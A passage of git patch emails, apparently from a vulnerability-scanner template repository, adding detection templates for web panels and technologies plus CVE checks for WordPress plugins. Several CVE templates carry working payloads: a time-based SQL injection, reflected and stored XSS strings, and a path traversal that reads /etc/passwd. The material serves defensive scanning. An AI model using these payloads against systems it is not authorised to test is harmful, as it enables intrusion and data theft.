From cc23685f5a0c6beeeb5ecfefa49e49e3235527c1 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Thu, 20 Oct 2022 21:33:49 +0700
Subject: [PATCH 01/93] fix: false negative wordpress template

---
 technologies/wordpress-detect.yaml | 34 +++++++++++++-----------------
 1 file changed, 15 insertions(+), 19 deletions(-)

diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml
index ec57c10377..ef137b53b8 100644
--- a/technologies/wordpress-detect.yaml
+++ b/technologies/wordpress-detect.yaml
@@ -2,40 +2,36 @@ id: wordpress-detect
 
 info:
   name: WordPress Detection
-  author: pdteam
+  author: pdteam,daffainfo
   severity: info
   metadata:
+    verified: true
     shodan-query: http.component:"WordPress"
   tags: tech,wordpress
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}"
+      - '{{BaseURL}}/feed/'
+      - '{{BaseURL}}/?feed=rss2' #alternative if /feed/ is blocked
 
-    host-redirects: true
-    max-redirects: 2
-    matchers-condition: or
+    stop-at-first-match: true
+    matchers-condition: and
     matchers:
-
       - type: regex
+        part: body
         regex:
-          - '<link[^>]+s\d+\.wp\.com'
-          - '<!-- This site is optimized with the Yoast (?:WordPress )?SEO plugin v([\d.]+) -'
-          - '<!--[^>]+WP-Super-Cache'
-        condition: or
+          - '<generator>'
+          - '<link>'
+          - '<title>'
+        condition: and
 
-      - type: word
-        words:
-          - 'wp-login.php'
-          - '/wp-content/themes/'
-          - '/wp-includes/'
-          - 'name="generator" content="wordpress'
-          - '<!-- performance optimized by w3 total cache. learn more: http://www.w3-edge.com/wordpress-plugins/'
-        condition: or
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex
         group: 1
         regex:
-          - 'content="WordPress ([0-9.]+)"'
\ No newline at end of file
+          - '(?m)https:\/\/wordpress.org\/\?v=([0-9.]+)'

From 4aaa3bed448963b3260e0b7fbfb68a4728d3452b Mon Sep 17 00:00:00 2001
From: geeknik <466878+geeknik@users.noreply.github.com>
Date: Fri, 21 Oct 2022 01:42:43 +0000
Subject: [PATCH 02/93] Create api-nytimes.yaml

---
 token-spray/api-nytimes.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 token-spray/api-nytimes.yaml

diff --git a/token-spray/api-nytimes.yaml b/token-spray/api-nytimes.yaml
new file mode 100644
index 0000000000..81ee271479
--- /dev/null
+++ b/token-spray/api-nytimes.yaml
@@ -0,0 +1,27 @@
+id: api-nytimes
+
+info:
+  name: NYTimes API Test
+  author: daffainfo
+  severity: info
+  description: NYTimes API Test
+  reference:
+    - https://developer.nytimes.com/apis
+  tags: token-spray,nytimes
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.nytimes.com/svc/mostpopular/v2/shared/1.json?api-key={{token}} HTTP/1.1
+        Host: api.nytimes.com
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'status'
+          - 'copyright'
+          - 'num_results'
+          - 'results'
+        condition: and

From af7f60c20584e56c3e320726a967966e6240072e Mon Sep 17 00:00:00 2001
From: Aman <aman@ubuntu.localdomain>
Date: Fri, 21 Oct 2022 06:28:20 -0700
Subject: [PATCH 03/93] Added template for CVE-2022-1057

---
 cves/2022/CVE-2022-1057.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 cves/2022/CVE-2022-1057.yaml

diff --git a/cves/2022/CVE-2022-1057.yaml b/cves/2022/CVE-2022-1057.yaml
new file mode 100644
index 0000000000..7ffbad96ac
--- /dev/null
+++ b/cves/2022/CVE-2022-1057.yaml
@@ -0,0 +1,31 @@
+id: CVE-2022-1057
+
+info:
+  name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQLi
+  author: theamanrawat
+  severity: critical
+  description: |
+    The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
+  reference:
+    - https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
+    - https://wordpress.org/plugins/pricing-deals-for-woocommerce/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1057
+  classification:
+    cve-id: CVE-2022-1057
+  metadata:
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,uauth
+
+requests:
+  - raw:
+      - |
+        @timeout: 15s
+        GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(5),3--+- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=5'
+          - 'status_code == 500'
\ No newline at end of file

From 1d0e907631adef298ac1f0c2341aaeef25ef9643 Mon Sep 17 00:00:00 2001
From: clem9669 <18504086+clem9669@users.noreply.github.com>
Date: Fri, 21 Oct 2022 15:15:36 +0000
Subject: [PATCH 04/93] Update nextcloud-detect.yaml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Hey 👋

I have added another path to detect URL rewrite.
URL rewrite is mentioned in the official documentation : https://docs.nextcloud.com/server/latest/admin_manual/installation/source_installation.html#pretty-urls or https://help.nextcloud.com/t/removing-index-php-from-the-nextcloud-uri/13055 and so on.

I just experienced the `/nextcloud/login`.

Cheers 😄
---
 technologies/nextcloud-detect.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/technologies/nextcloud-detect.yaml b/technologies/nextcloud-detect.yaml
index f458ff5963..06e13fa604 100644
--- a/technologies/nextcloud-detect.yaml
+++ b/technologies/nextcloud-detect.yaml
@@ -18,6 +18,7 @@ requests:
     path:
       - '{{BaseURL}}'
       - '{{BaseURL}}/login'
+      - '{{BaseURL}}/nextcloud/login'
       - '{{BaseURL}}/nextcloud/index.php/login'
 
     stop-at-first-match: true

From a0460604bee7843d7915831641fedafea5bf79bc Mon Sep 17 00:00:00 2001
From: Jihoon Lee <dlwlgns6512@gmail.com>
Date: Sat, 22 Oct 2022 00:27:05 +0900
Subject: [PATCH 05/93] Create CVE-2022-1007.yaml

---
 cves/2022/CVE-2022-1007.yaml | 48 ++++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100644 cves/2022/CVE-2022-1007.yaml

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
new file mode 100644
index 0000000000..c7185e791f
--- /dev/null
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-1007
+
+info:
+  name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
+  author: 8arthur
+  severity: medium
+  description: |
+    The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
+  reference:
+    - https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
+    - https://wordpress.org/plugins/advanced-booking-calendar/
+    - https://nvd.nist.gov/vuln/detail/cve-2022-1007
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-1007
+    cwe-id: CWE-79
+  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In
+
+      - |
+        GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

From b8cfdcd34cf52f9a6e06119de82eab508b313378 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sat, 22 Oct 2022 08:10:58 +0700
Subject: [PATCH 06/93] improve: changing 1 matcher CVE-2022-0928

---
 cves/2022/CVE-2022-0928.yaml | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/cves/2022/CVE-2022-0928.yaml b/cves/2022/CVE-2022-0928.yaml
index a1ea777562..5247e9ddfd 100644
--- a/cves/2022/CVE-2022-0928.yaml
+++ b/cves/2022/CVE-2022-0928.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-0928
 
 info:
-  name: Microweber <1.2.12 - Stored Cross-Site Scripting
+  name: Microweber < 1.2.12 - Stored Cross-Site Scripting
   author: amit-jd
   severity: medium
   description: |
@@ -16,7 +16,7 @@ info:
     cve-id: CVE-2022-0928
     cwe-id: CWE-79
   metadata:
-    verified: "true"
+    verified: true
   tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
 
 requests:
@@ -36,7 +36,7 @@ requests:
 
         id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
 
-      - |-
+      - |
         POST /module HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@@ -49,9 +49,9 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
+          - 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
           - 'contains(all_headers_3,"text/html")'
-          - 'status_code==200'
+          - 'status_code_2 == 200 && status_code_3 == 200'
         condition: and
 
 # Enhanced by mp on 2022/09/14

From f3a7900504409db1dad0c54e4e40cff4a2ad8193 Mon Sep 17 00:00:00 2001
From: Aman Rawat <rawataman6525@gmail.com>
Date: Sat, 22 Oct 2022 19:13:27 +0530
Subject: [PATCH 07/93] Added template for CVE-2022-41840

---
 cves/2022/CVE-2022-41840.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 cves/2022/CVE-2022-41840.yaml

diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml
new file mode 100644
index 0000000000..6b269c437c
--- /dev/null
+++ b/cves/2022/CVE-2022-41840.yaml
@@ -0,0 +1,28 @@
+id: CVE-2022-41840
+
+info:
+  name: Welcart eCommerce <= 2.7.7 - Unauth. Directory Traversal
+  author: theamanrawat
+  severity: high
+  description: |
+    WordPress Welcart eCommerce plugin <= 2.7.7 - Unauth. Directory Traversal vulnerability.
+  reference:
+    - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
+    - https://wordpress.org/plugins/usc-e-shop/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
+  classification:
+    cve-id: CVE-2022-41840
+  metadata:
+    verified: "true"
+  tags: wp-plugin,wp,lfi,unauth,wpscan,cve2022,wordpress,cve,usc-e-shop
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body
\ No newline at end of file

From a660ac94c87bf13659cc0cbe13316bee9d916bbe Mon Sep 17 00:00:00 2001
From: Keijo Korte <git@kvak.net>
Date: Sat, 22 Oct 2022 22:47:14 +0300
Subject: [PATCH 08/93] Added Temenos T24 Login Page -template

---
 exposed-panels/temenos-t24-login.yaml | 31 +++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 exposed-panels/temenos-t24-login.yaml

diff --git a/exposed-panels/temenos-t24-login.yaml b/exposed-panels/temenos-t24-login.yaml
new file mode 100644
index 0000000000..c8f4ef6a83
--- /dev/null
+++ b/exposed-panels/temenos-t24-login.yaml
@@ -0,0 +1,31 @@
+id: temenos-t24-login-panel
+
+info:
+  name: Temenos T24/Transact Login Page
+  author: korteke
+  severity: info
+  description: Exposed Temenos T24 login panel
+  reference:
+    - https://www.temenos.com/products/transact/
+  metadata:
+    verified: true
+    shodan-query: http.title:"t24 sign in"
+  tags: panel,exposure,temenos
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/servlet/BrowserServlet"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>T24 Sign in</title>'
+          - 'value="CREATE.SESSION"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

From cd117cca7f0fe5d4515202f95f9a61452e991c3e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 23 Oct 2022 03:54:28 +0530
Subject: [PATCH 09/93] Update CVE-2022-41840.yaml

---
 cves/2022/CVE-2022-41840.yaml | 18 +++++++++++++-----
 1 file changed, 13 insertions(+), 5 deletions(-)

diff --git a/cves/2022/CVE-2022-41840.yaml b/cves/2022/CVE-2022-41840.yaml
index 6b269c437c..547e74894b 100644
--- a/cves/2022/CVE-2022-41840.yaml
+++ b/cves/2022/CVE-2022-41840.yaml
@@ -1,11 +1,9 @@
 id: CVE-2022-41840
 
 info:
-  name: Welcart eCommerce <= 2.7.7 - Unauth. Directory Traversal
+  name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
   author: theamanrawat
   severity: high
-  description: |
-    WordPress Welcart eCommerce plugin <= 2.7.7 - Unauth. Directory Traversal vulnerability.
   reference:
     - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
     - https://wordpress.org/plugins/usc-e-shop/
@@ -14,15 +12,25 @@ info:
     cve-id: CVE-2022-41840
   metadata:
     verified: "true"
-  tags: wp-plugin,wp,lfi,unauth,wpscan,cve2022,wordpress,cve,usc-e-shop
+  tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
 
+    matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
\ No newline at end of file
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

From f46f191b9fe47f2456c2c1ef2053f8b6c7e75d82 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 23 Oct 2022 03:57:06 +0530
Subject: [PATCH 10/93] Update CVE-2022-1007.yaml

---
 cves/2022/CVE-2022-1007.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
index c7185e791f..e5190f97f1 100644
--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -15,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2022-1007
     cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan
+  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated
 
 requests:
   - raw:

From eece789f34489da7f658c9610168704d692f2929 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 23 Oct 2022 04:03:56 +0530
Subject: [PATCH 11/93] Update CVE-2022-1007.yaml

---
 cves/2022/CVE-2022-1007.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
index e5190f97f1..460faf5f32 100644
--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -37,6 +37,8 @@ requests:
         part: body
         words:
           - '<script>alert(document.domain)</script>'
+          - 'advanced-booking-calendar'
+        condition: and
 
       - type: word
         part: header

From fbb3fef96b2c91b10d63f8e0d7f915ee909c92af Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 09:46:56 +0530
Subject: [PATCH 12/93] Update CVE-2022-1007.yaml

---
 cves/2022/CVE-2022-1007.yaml | 29 ++++++++++-------------------
 1 file changed, 10 insertions(+), 19 deletions(-)

diff --git a/cves/2022/CVE-2022-1007.yaml b/cves/2022/CVE-2022-1007.yaml
index 460faf5f32..2a3d7319f9 100644
--- a/cves/2022/CVE-2022-1007.yaml
+++ b/cves/2022/CVE-2022-1007.yaml
@@ -11,11 +11,10 @@ info:
     - https://wordpress.org/plugins/advanced-booking-calendar/
     - https://nvd.nist.gov/vuln/detail/cve-2022-1007
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
     cve-id: CVE-2022-1007
-    cwe-id: CWE-79
-  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated
+  metadata:
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,xss,wp,advanced-booking-calendar,authenticated
 
 requests:
   - raw:
@@ -31,20 +30,12 @@ requests:
         Host: {{Hostname}}
 
     cookie-reuse: true
-    matchers-condition: and
+    req-condition: true
     matchers:
-      - type: word
-        part: body
-        words:
-          - '<script>alert(document.domain)</script>'
-          - 'advanced-booking-calendar'
+      - type: dsl
+        dsl:
+          - "contains(all_headers_2, 'text/html')"
+          - "status_code_2 == 200"
+          - "contains(body_2, '<script>alert(document.domain)</script>')"
+          - "contains(body_2, 'advanced-booking-calendar')"
         condition: and
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200

From 699531402868826e6f1d2dcfff2f5b5e78b15b21 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 10:08:40 +0530
Subject: [PATCH 13/93] Update CVE-2022-1057.yaml

---
 cves/2022/CVE-2022-1057.yaml | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/cves/2022/CVE-2022-1057.yaml b/cves/2022/CVE-2022-1057.yaml
index 7ffbad96ac..90f8620eca 100644
--- a/cves/2022/CVE-2022-1057.yaml
+++ b/cves/2022/CVE-2022-1057.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-1057
 
 info:
-  name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQLi
+  name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
   author: theamanrawat
   severity: critical
   description: |
@@ -14,18 +14,19 @@ info:
     cve-id: CVE-2022-1057
   metadata:
     verified: true
-  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,uauth
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,pricing-deals-for-woocommerce,unauth
 
 requests:
   - raw:
       - |
         @timeout: 15s
-        GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(5),3--+- HTTP/1.1
+        GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
         Host: {{Hostname}}
 
-    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=5'
-          - 'status_code == 500'
\ No newline at end of file
+          - 'duration>=6'
+          - 'status_code == 500'
+          - 'contains(body, "been a critical error")'
+        condition: and

From d3b3cc5ce546d527e30bbb889f9b8583d0a2b305 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 10:23:57 +0530
Subject: [PATCH 14/93] Create openvpn-connect.yaml

---
 exposed-panels/openvpn-connect.yaml | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 exposed-panels/openvpn-connect.yaml

diff --git a/exposed-panels/openvpn-connect.yaml b/exposed-panels/openvpn-connect.yaml
new file mode 100644
index 0000000000..aecbab9012
--- /dev/null
+++ b/exposed-panels/openvpn-connect.yaml
@@ -0,0 +1,26 @@
+id: openvpn-connect
+
+info:
+  name: OpenVPN Connect Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"openvpn connect"
+  tags: openvpn,connect,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?src=connect'
+
+    cookie-reuse: true
+    host-redirects: true
+    max-redirects: 2
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'content="OpenVPN Connect'
+          - '<title>OpenVPN Connect</title>'
+        condition: or

From 924ac9bd9024e8fc341eac26ff17d3c9f04faa7c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 10:49:24 +0530
Subject: [PATCH 15/93] Create openvpn-admin.yaml

---
 exposed-panels/openvpn-admin.yaml | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 exposed-panels/openvpn-admin.yaml

diff --git a/exposed-panels/openvpn-admin.yaml b/exposed-panels/openvpn-admin.yaml
new file mode 100644
index 0000000000..7cae58bea4
--- /dev/null
+++ b/exposed-panels/openvpn-admin.yaml
@@ -0,0 +1,31 @@
+id: openvpn-admin
+
+info:
+  name: OpenVPN Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"OpenVPN-Admin"
+  tags: openvpn,admin,config,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/login'
+      - '{{BaseURL}}/index.php'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>OpenVPN-Admin'
+          - '<title>OpenVPN Admin'
+        condition: or
+
+      - type: status
+        status:
+          - 200

From ca6bed82ab286187666f5803fa950a3bf11aa2ea Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sun, 23 Oct 2022 10:59:59 +0530
Subject: [PATCH 16/93] Create turnkey-openvpn.yaml

---
 exposed-panels/turnkey-openvpn.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 exposed-panels/turnkey-openvpn.yaml

diff --git a/exposed-panels/turnkey-openvpn.yaml b/exposed-panels/turnkey-openvpn.yaml
new file mode 100644
index 0000000000..5289fb9c3c
--- /dev/null
+++ b/exposed-panels/turnkey-openvpn.yaml
@@ -0,0 +1,28 @@
+id: turnkey-openvpn
+
+info:
+  name: TurnKey OpenVPN Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"TurnKey OpenVPN"
+  tags: openvpn,turnkey,webshell,panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'TurnKey OpenVPN'
+          - 'Web Shell'
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 4b8efed7862db03f95d742d48af05e3ba25ed488 Mon Sep 17 00:00:00 2001
From: Arman <65326024+tess-ss@users.noreply.github.com>
Date: Sun, 23 Oct 2022 01:35:27 -0400
Subject: [PATCH 17/93] Create git-repository-browser.yaml

---
 technologies/git-repository-browser.yaml | 30 ++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 technologies/git-repository-browser.yaml

diff --git a/technologies/git-repository-browser.yaml b/technologies/git-repository-browser.yaml
new file mode 100644
index 0000000000..fcee91f0e0
--- /dev/null
+++ b/technologies/git-repository-browser.yaml
@@ -0,0 +1,30 @@
+id: git-repository-browser
+
+info:
+  name: Git repository browser detect
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: http.title:"Git repository browser"
+  tags: tech,detect,git,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Git repository browser"
+          - "a fast webinterface for the git dscm"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 62a5122a4a9d1177068899f14d6708eb09c58aeb Mon Sep 17 00:00:00 2001
From: Aman Rawat <rawataman6525@gmail.com>
Date: Sun, 23 Oct 2022 11:15:28 +0530
Subject: [PATCH 18/93] Added template for xeams-admin

---
 exposed-panels/xeams-admin.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 exposed-panels/xeams-admin.yaml

diff --git a/exposed-panels/xeams-admin.yaml b/exposed-panels/xeams-admin.yaml
new file mode 100644
index 0000000000..182e346c3f
--- /dev/null
+++ b/exposed-panels/xeams-admin.yaml
@@ -0,0 +1,30 @@
+id: xeams-admin
+
+info:
+  name: Xeams Admin Console
+  author: theamanrawat
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Xeams Admin"
+  tags: xeams,admin,console
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/FrontController'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Xeams Admin Console'
+          - 'eXtended Email And Messaging Server</span>'
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From 35cb176f243e491c8591a370c203224dd6673268 Mon Sep 17 00:00:00 2001
From: Arman <65326024+tess-ss@users.noreply.github.com>
Date: Sun, 23 Oct 2022 01:52:22 -0400
Subject: [PATCH 19/93] Create gitblit-panel-detect.yaml

---
 exposed-panels/gitblit-panel-detect.yaml | 31 ++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 exposed-panels/gitblit-panel-detect.yaml

diff --git a/exposed-panels/gitblit-panel-detect.yaml b/exposed-panels/gitblit-panel-detect.yaml
new file mode 100644
index 0000000000..650e5a080c
--- /dev/null
+++ b/exposed-panels/gitblit-panel-detect.yaml
@@ -0,0 +1,31 @@
+id: gitblit-panel-detect
+
+info:
+  name: Gitblit login panel detect
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: http.title:"Gitblit"
+  tags: tech,detect,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Gitblit</title>"
+          - "Welcome to Gitblit"
+          - "A quick and easy way to host or view your own"
+        condition: and
+
+      - type: status
+        status:
+          - 200

From b4a5d19473f8fa0bc23cdd7a081fa52a3a8f71b0 Mon Sep 17 00:00:00 2001
From: Arman <65326024+tess-ss@users.noreply.github.com>
Date: Sun, 23 Oct 2022 02:10:22 -0400
Subject: [PATCH 20/93] Create maestro-login-panel.yaml

---
 exposed-panels/maestro-login-panel.yaml | 30 +++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 exposed-panels/maestro-login-panel.yaml

diff --git a/exposed-panels/maestro-login-panel.yaml b/exposed-panels/maestro-login-panel.yaml
new file mode 100644
index 0000000000..b95872a768
--- /dev/null
+++ b/exposed-panels/maestro-login-panel.yaml
@@ -0,0 +1,30 @@
+id: maestro-login-panel
+
+info:
+  name: Maestro - LuCI login panel detect
+  author: tess
+  severity: info
+  metadata:
+    verified: true
+    shodan-dork: http.title:"Maestro - LuCI"
+  tags: tech,detect,misc
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/luci"
+
+    host-redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>Maestro - LuCI</title>"
+          - "Please enter your username and password."
+        condition: and
+
+      - type: status
+        status:
+          - 200

From fceae2cc27fe3872f1c7e7636d08b8660a2fd1a2 Mon Sep 17 00:00:00 2001
From: Aman Rawat <rawataman6525@gmail.com>
Date: Sun, 23 Oct 2022 11:43:14 +0530
Subject: [PATCH 21/93] Added template for openfire-admin-panel

---
 exposed-panels/openfire-admin-panel.yaml | 30 ++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 exposed-panels/openfire-admin-panel.yaml

diff --git a/exposed-panels/openfire-admin-panel.yaml b/exposed-panels/openfire-admin-panel.yaml
new file mode 100644
index 0000000000..5c82dfbaf1
--- /dev/null
+++ b/exposed-panels/openfire-admin-panel.yaml
@@ -0,0 +1,30 @@
+id: openfire-admin-panel
+
+info:
+  name: Openfire Admin Console
+  author: theamanrawat
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"Openfire Admin Console"
+  tags: openfire,admin,console, panel
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/login.jsp'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Openfire Admin Console'
+          - 'Openfire, Version:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file

From a3981938997020fb4df96a75a490060a6835b9ab Mon Sep 17 00:00:00 2001
From: Arman <65326024+tess-ss@users.noreply.github.com>
Date: Sun, 23 Oct 2022 02:20:12 -0400
Subject: [PATCH 22/93] Create code-server-login-panel.yaml

---
 exposed-panels/code-server-login-panel.yaml | 30 +++++++++++++++++++++
 1 file changed, 30 insertions(+)
